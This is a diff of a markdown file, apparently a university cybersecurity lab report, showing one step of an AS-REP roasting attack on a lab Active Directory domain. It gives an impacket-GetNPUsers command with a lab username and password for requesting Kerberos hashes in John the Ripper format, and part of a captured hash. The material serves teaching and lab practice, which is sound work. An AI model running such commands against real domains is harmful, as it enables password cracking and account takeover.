AM311/Cybersecurity_Report/home.md

  3. **Ask for a TGT for these accounts:**
  Using the following command we ask the DC for a TGT foreach of the previous accounts and we format them so that they are ready to be cracked using *John the Ripper*:

-    `impacket-GetNPUsers -dc-ip 10.0.2.200 cybersec.units.it/DomainUser:User00! -request`
+    `impacket-GetNPUsers -dc-ip 10.0.2.200 cybersec.units.it/DomainUser:User00! -request -format john`
-     `-format john`

-	From the output, we copy the string referring to the desired account (*as shown below*) in a **text file** called usernamex.txt and placed on the desktop `./Desktop/usernames.txt`.
+	From the output, we copy the string referring to the desired account (*as shown below*) in a **text file** called `usernames.txt` and located on the desktop.

 	   `$krb5asrep$DNSoperator@CYBERSEC.UNITS.IT:8690a5aa5b288a036a49126539f292ef$afe3e87aafc
 	    35690745c5dfeb1f459dcc1ed858f1f4755d3aefa12921c93dbc35b35c0fd6094be7390eab67e0c016f96